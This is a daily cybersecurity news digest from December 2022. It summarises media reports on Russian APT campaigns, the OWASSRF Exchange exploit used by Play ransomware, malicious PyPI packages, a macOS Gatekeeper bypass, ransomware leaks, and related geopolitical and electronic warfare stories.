Wednesday, December 21, 2022 // (IG): BB // THM:Windows RE // Coffee for Bob
Russia-linked Gamaredon APT targeted a petroleum refining company in a NATO nation in August
FROM THE MEDIA: A hacking group associated with Russia’s Federal Security Service (FSB) unsuccessfully attempted to compromise a large petroleum refining company within a NATO member state at the end of August, according to a new report. The advanced persistent threat group, known as Trident Ursa (also referred to as Gamaredon, Primitive Bear and Shuckworm) is “a specially created structural unit“ of the FSB “whose tasks are intelligence and subversive activities against Ukraine in cyberspace,” in the analysis of Ukraine’s Security Service. It primarily uses HTML and Word documents as spear phishing lures which, alongside its traditional efforts targeting Ukrainian entities with Ukrainian-language lures, are now also increasingly using English-language lures according to research published Tuesday by Palo Alto Networks’ Unit 42.
READ THE STORY: Security Affairs // The Record // CNN Politics // BankInfoSec
Military operations software in Ukraine was breached by Russian hackers
FROM THE MEDIA: Hackers targeted software critical to Ukraine’s military efforts with information-stealing malware, Ukraine’s Computer Emergency Response Team (CERT-UA) reported last week. The attackers sent messages in mid-December from a hacked email address belonging to a Ukraine Ministry of Defense employee to users of the program, which is called Delta. CERT-UA publicized the breach a few days later, on December 18. Military commanders and soldiers have access to the platform, which is the “eyes” of the Ukrainian armed forces. It collects data on everything happening on the ground, in the sea, in the air, in space, and in cyberspace using drones, satellite images, electronic warfare systems, or surveillance cameras.
READ THE STORY: The Record
CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations
FROM THE MEDIA: CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022-41040 and CVE-2022-41082. In each case, CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022-41040 for initial access. Instead, it appeared that corresponding requests were made directly through the Outlook Web Application (OWA) endpoint, indicating a previously undisclosed exploit method for Exchange.
READ THE STORY: CrowdStrike
Ukraine attacks changed Russian GPS jamming
FROM THE MEDIA: Two Russian airbases deep inside the country were attacked on December 5: the Engels-2 base in the Saratov region and Dyagilevo near Ryazan. The next day an oil tank at the Kursk airfield closer to the border with Ukraine was hit and set on fire. Reports from Russian witnesses and unofficial sources in Ukraine indicate that the attacks were carried out with UAVs operated by the Ukrainian military. The Russian government has long interfered with reception of GPS signals, especially near and within its own borders. The early December attacks seem to have motivated an increase in this activity. Information displayed by the website GPSJam.org indicates that, on the first day of the attacks, GPS interference was detected around Moscow, at two airbases to the east, and near the Engels-2 airbase. GPSJam.org uses anomalies in crowdsourced aviation ADS-B data as an indicator of unreliable GPS signals.
READ THE STORY: GPS World
Why an ASAT Test Ban Is Important
FROM THE MEDIA: There is growing momentum behind a global moratorium on destructive kinetic anti-satellite (ASAT) tests. A few days ago, the United Nations General Assembly (UNGA) passed a resolution calling for a ban on kinetic ASAT tests. The resolution was sponsored by the United States along with a number of other countries that have been concerned about the consequences of ASAT tests on the safety and sustainability of outer space. As many as 155 countries voted in support of the resolution, nine voted against it, and nine others abstained. Those who voted against the resolution were Belarus, Bolivia, Central African Republic, China, Cuba, Iran, Nicaragua, Russia, and Syria. The nine abstentions were India, Laos, Madagascar, Pakistan, Serbia, Sri Lanka, Sudan, Togo, and Zimbabwe.
READ THE STORY: ORF
German industrial giant ThyssenKrupp targeted in a new cyberattack
FROM THE MEDIA: German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services division and corporate headquarters were hit by a cyberattack. At this time the company has yet to disclose the type of attack that hit its systems and no cybercriminal group has yet to claim responsibility for the attack. A company spokesman declared that there are no indications of a data breach. “Thyssenkrupp is currently the target of a cyberattack — presumably by organized crime” and that “at the present time, no damage has been done, nor are there any indications that data has been stolen or modified.” a spokesperson told Agence France Presse. “At the present time, no damage has been done, nor are there any indications that data has been stolen or modified.”
READ THE STORY: Security Affairs // siliconANGLE
'Russian hackers' help two New York men game JFK taxi system
FROM THE MEDIA: A pair of men living in New York, working with unnamed Russian nationals, hacked and manipulated the electronic taxis dispatch system at John F. Kennedy International Airport as part of a money-making scheme over a period of at least two years, federal prosecutors said Tuesday. Starting in at least September 2019, Daniel Abayev and Peter Leyman ran a pay-to-play system for cabbies who could jump the line instead of idling in a holding lot until hailed by a dispatcher, prosecutors with the Southern District of New York said in a statement. Leyman allegedly charged taxi drivers $10 for each time they skipped ahead and gave other drivers waivers from the $10 fee if they recruited more paying drivers.
READ THE STORY: Cyberscoop
Can hardware wallets be hacked
FROM THE MEDIA: Managing cryptocurrency assets can be done in a custodial or non-custodial way. Those who opt for the latter often use a hardware wallet, which provides many benefits but also has a steep learning curve. Even then, the question remains: are these devices 100% secure? There are many good reasons why so many crypto users rely on hardware wallets to protect their assets. Unlike a software wallet, the hardware unit doesn’t connect to the internet directly. Instead, it often requires a computer or mobile device connection, introducing an extra security layer. Moreover, the private keys and seed phrases are only stored locally. That means no one can access them without physical access to the device and the necessary credentials to use funds.
READ THE STORY: OODALOOP
Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations
FROM THE MEDIA: Threat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access (OWA). "The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint," CrowdStrike researchers Brian Pitchford, Erik Iker, and Nicolas Zilio said in a technical write-up published Tuesday. Play ransomware, which first surfaced in June 2022, has been revealed to adopt many tactics employed by other ransomware families such as Hive and Nokoyawa, the latter of which upgraded to Rust in September 2022.
READ THE STORY: THN
Clop ransomware group targeting provider-patient trust by infecting medical images
FROM THE MEDIA: The healthcare sector has long been warned they’re not keeping pace with evolving threats, creating an untenable situation resulting in serious impacts. New insights from Hold Security shows Clop ransomware actors are upping the ante, targeting the trusted relationships between providers and patients to deliver their payload. The risk to healthcare is greater than before. Hold Security Founder Alex Holden warns that “the message is simple: all medical professionals need to get better because the bad guys are stepping up. We need to speed up.” n May, the Department of Health and Human Services Cybersecurity Coordination Center alerted the sector to the consistency of ransomware attacks on providers over the year, with a rise in access brokers selling access to healthcare networks to other groups and affiliates.
READ THE STORY: SCMAG
Stolen Events DC files exposed by BlackCat ransomware gang
FROM THE MEDIA: District of Columbia convention and sports authority Events D.C. had files stolen from a cyberattack first reported two months ago leaked by the BlackCat ransomware gang, also known as ALPHV, last week, reports StateScoop. BlackCat has posted screenshots of an 85 GB cache showing a file directory with numerous folders containing workforce and operations information, adding that all of the stolen data has been posted after Events D.C. refused to pay the demanded ransom. "We're evaluating this apparent release of our data," said Events D.C., which operates the DC Armory and owns the Nationals Park baseball stadium, in a statement.
READ THE STORY: SCMAG
Malicious PyPI package found posing as a SentinelOne SDK
FROM THE MEDIA: Threat researchers have found a rapidly updated malicious Python package on PyPI masquerading as a legitimate software-development kit (SDK) from cybersecurity firm SentinelOne, but actually contains malware designed to exfiltrate data from infected systems. The package, which carried the name SentinelOne and has since been taken down, was uploaded to the Python Package Index – an online index of packages for Python developers – on December 11 and over two days was updated 20 times. It promised a simpler way to access and consume SentinelOne's APIs but included backdoor malware that enabled it to steal sensitive information from developers' systems, including SSH keys, credentials, configuration and host files, and configuration information from Amazon Web Services and Kubernetes .
READ THE STORY: The Register
Gatekeeper bypass exposes Macs to malware
FROM THE MEDIA: Microsoft has gone public with an analysis of a mac OS Gatekeeper bug it discovered in July, dubbed Achilles, following patch releases by Apple last week. The bug, CVE-2022-42821, exists in the macOS Monterey, Big Sur, and Ventura, allowing an app to bypass Gatekeeper checks. Gatekeeper checks apps users download from the Internet. If the app is signed by Apple, the user is asked to confirm they wish to launch it; if not, the app is untrusted and execution is refused. What Microsoft threat researcher Jonathan Bar Or discovered is that an attacker could use mac OS access control lists (ACLs) to bypass Gatekeeper.
READ THE STORY: iTNews // The Register
Raspberry Robin worm drops fake malware to confuse researchers
FROM THE MEDIA: The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools. This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems. Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution.
READ THE STORY: Bleeping Computer
GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps
FROM THE MEDIA: An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning across 16 countries. This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, Canada, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. The malware, like many financial trojans targeting the Android ecosystem, attempts to steal user credentials by generating convincing overlay screens (aka web fakes) that are served atop target applications.
READ THE STORY: THN
Hackers bombard PyPi platform with information-stealing malware
FROM THE MEDIA: The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data. The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022. Since then, an additional 31 packages dropping 'W4SP' have been removed from the PyPI repository, with the malware's operators continuing to seek new ways to reintroduce their malware on the platform.
READ THE STORY: Bleeping Computer
Appeals court rejects China Telecom bid to reverse US ban
FROM THE MEDIA: A federal appeals court on Tuesday rejected China Telecom Corp’s challenge to a Federal Communications Commission order withdrawing the company’s authority to provide services in the United States. A three-judge panel of the US Court of Appeals for the District of Columbia rejected the bid by the US arm of China Telecom to reverse the order that took effect in January. The FCC said in 2021 that China Telecom (Americas) “is subject to exploitation, influence and control by the Chinese government.” A lawyer for China Telecom (Americas) did not immediately comment. The appeals court panel did not immediately make its opinion public.
READ THE STORY: CNN
Cyber National Mission Force to bolster efforts vs foreign threats with elevated status
FROM THE MEDIA: The Cyber National Mission Force has been upgraded to a "subordinate unified command" under the U.S. Cyber Command by the Department of Defense following its integral role in Cyber Command's efforts in strengthening election security, bolstering Ukraine's defenses in combating Russian cyber threats, and battling ransomware and cyberespionage attacks, reports The Record, a news site by cybersecurity firm Recorded Future. CNMF's new designation would provide it more agility in responding to threats. More than 60 networks across 21 countries have been examined by hunt forward teams sent by the CNMF over the past four years, with Ukraine, Croatia, and Lithuania receiving such assistance this year.
READ THE STORY: SCMAG
Cisco’s Talos security bods predict new wave of Excel Hell
FROM THE MEDIA: It took a few years and one temporary halt, but in July Microsoft finally began blocking certain macros by default in Word, Excel, and PowerPoint, cutting off a popular attack vector for those who target users of Microsoft's Windows OS and Office suite. While recent versions of Office block Visual Basic for Applications (VBA) macros by default, older versions of the suite and its component programs remain enormously prevalent. Blocking macros therefore won't deter cybercriminals from targeting Microsoft's signature productivity applications. They'll just have to find other options. A report released on Tuesday by researchers from Cisco's Talos threat intelligence group dissected one: XLL files in Excel.
READ THE STORY: The Register
Ransomware gang uses new Microsoft Exchange exploit to breach servers
FROM THE MEDIA: Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA). Cybersecurity firm CrowdStrike spotted the exploit (dubbed OWASSRF) while investigating Play ransomware attacks where compromised Microsoft Exchange servers were used to infiltrate the victims' networks. To execute arbitrary commands on compromised servers, the ransomware operators leveraged Remote PowerShell to abuse the CVE-2022-41082, the same bug exploited by ProxyNotShell.
READ THE STORY: Bleeping Computer
Okta's source code stolen after GitHub repositories hacked
FROM THE MEDIA: Okta, a leading provider of authentication services and Identity and Access Management (IAM) solutions, says that its private GitHub repositories were hacked this month. According to a 'confidential' email notification sent by Okta and seen by BleepingComputer, the security incident involves threat actors stealing Okta's source code. BleepingComputer has obtained a 'confidential' security incident notification that Okta has been emailing to its 'security contacts' as of a few hours ago. We have confirmed that multiple sources, including IT admins, have been receiving this email notification.
READ THE STORY: Bleeping Computer
Bitcoin Ransoms Aren’t Dead: EV Maker NIO Refuses To Pay Up
FROM THE MEDIA: Bitcoin-hungry hackers have unsuccessfully held Chinese electric vehicle maker NIO to ransom and are now selling sensitive customer data online for crypto. Earlier this month, hackers emailed NIO demanding $2.25 million in bitcoin or else they’d release data stolen sometime last year, according to Bloomberg. An internal investigation reportedly revealed some NIO customer and user data had been compromised. But NIO refused to pay. “On Dec. 20, 2022, [NIO] was made aware that certain information of users and vehicle sales in China before Aug. 2021 were sold on the internet by third parties for illegal purposes.”
READ THE STORY: BlockWorks // Automotive News // Reuters
Korean IT expert arrested after hacking into over 400,000 home cameras
FROM THE MEDIA: A South Korean man in his thirties was arrested on Tuesday after hacking into over 400,000 home security cameras and attempting to sell the footage, according to police. The man, identified as Lee, allegedly used his knowledge as a cybersecurity and IT expert to hack into a total of 404,847 cameras in 638 apartment complexes across South Korea between August and November 2021, Yonhap reports. Upon creating an automated hacking program, police said Lee was able to use 10 wireless routers to hack into apartment complex servers, allowing him to access the cameras of control pads mounted on the walls of 404,847 apartments. Lee then attempted to sell the personal videos and photos, inviting buyers interested in hidden footage to contact him.
READ THE STORY: Yahoo News
Russian mobile calls, internet seen deteriorating after Nokia, Ericsson leave
FROM THE MEDIA: When telecoms gear makers Nokia and Ericsson leave Russia at the end of the year, their departure could steadily cripple the country's mobile networks over the long-term, setting off a deterioration in communication for everyday Russians. Five senior telecoms executives and other industry sources said Russian mobile phone users will likely experience slower downloads and uploads, more dropped calls, calls that won't connect, and longer outages as operators lose the ability to upgrade or patch software, and battle over dwindling spare parts inventories. Ericsson and Nokia, which together account for a large share of the telecoms equipment market and close to 50% in terms of base stations in Russia, make everything from the telecom antennas to the hardware that connects optical fiber carrying digital signals.
READ THE STORY: Reuters
Items of interest
Russia Acknowledges a Prolonged War: What Does That Mean?
FROM THE MEDIA: Vladimir Putin has now acknowledged that Russia is fighting a protracted war in Ukraine. He has also stated that there will not be another mobilization in the foreseeable future and reiterated that Russia’s strategy is a defensive retaliatory one and that this suggested no nuclear weapons would be used. While the remarks about nuclear weapons should have been gratefully received abroad; Putin on December 8 publicly mused about using them preemptively against the U.S. and NATO. In other words, he is back to making nuclear threats despite pressure from China and India and the West to forego such threats. Since Putin also has recently said that only he can be trusted, and his reputation for mendacity has long since been incontrovertibly established, we are once again left in the position of reading his tea leaves.
READ THE STORY: Real Clear Defense
Electronic Warfare; a Brief Overview of Weaponized RF Design (Video)
FROM THE MEDIA: Whether you are trying to avoid having a multi-million dollar fighter jet from being shot down or avoid a speeding ticket from law enforcement , the same radar and electronic warfare equations and concepts apply.
Electronic Warfare on a Budget of $15 or Less (Video)
FROM THE MEDIA: You are constantly being irradiated by a plethora of gadgets and gizmos firing photons through your body every second, so why not figure out how to read those airwaves?
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com